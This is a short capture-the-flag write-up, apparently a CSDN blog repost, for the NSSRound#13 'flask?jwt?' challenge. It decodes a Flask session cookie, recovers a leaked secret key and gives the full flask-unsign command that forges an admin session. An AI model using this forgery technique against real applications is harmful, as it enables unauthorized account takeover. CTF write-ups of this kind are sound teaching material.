NSS [NSSRound#13 Basic]flask?jwt?

编程语言 2024-11-06 19:41:07 阅读次数: 0

NSS [NSSRound#13 Basic]flask?jwt?

开题

注册一下

要admin才能拿flag

看看是如何进行身份验证的

是flask session

flask-unsign --decode --cookie '.eJwtzjESwyAMBMC_UKfghJCEP-MRICZp7bjK5O9xkX6L_aR9HXE-0_Y-rnik_TXTlsiXEhUXleKGGGuG1jbmogrCEmNirZ7BEB-VJbTfIi-26hQDvWFyzsFdIdHMTYgROayNkqGlUs1Yzh2CojaBzlYmm1houiPXGcd_k74_WpMthA.Zp5C_A.O2TQEvcblnODCPckOFz4M63OVvE'

找一下密钥，在忘记密码功能处找到了。secretkey: th3f1askisfunny

伪造一下，_user_id改成1

flask-unsign --sign --cookie "{'_fresh': True, '_id': '2af7223a6763a81ecfde759cdf25121f6842475a01416ac546e7be750f485a2ec1b91d400e4b716e98a86241e0e89c3017352501fa4b161378d11b483d4868e7', '_user_id': '1'}" --secret 'th3f1askisfunny'

猜你喜欢

转载自blog.csdn.net/Jayjay___/article/details/140700503

今日推荐

周排行

教你如何约女孩子的方式去理解（TCP三次握手与四次挥手）

android按压背景

【量化小讲堂-Python&Pandas系列10】如何判断一个策略的好坏？(附代码)

编程题：利用链表实现栈

盘点47条 Allegro 使用技巧，你都知道吗？

在VMware Workstation中安装CentOS

二叉树的实现

cmake安装jsoncpp

ReactNative开发城市列表页

最全前端学习资源

每日归档

更多

2025-03-20(0)

2025-03-19(0)

2025-03-18(0)

2025-03-17(0)

2025-03-16(0)

2025-03-15(0)

2025-03-14(0)

2025-03-13(0)

2025-03-12(0)

2025-03-11(0)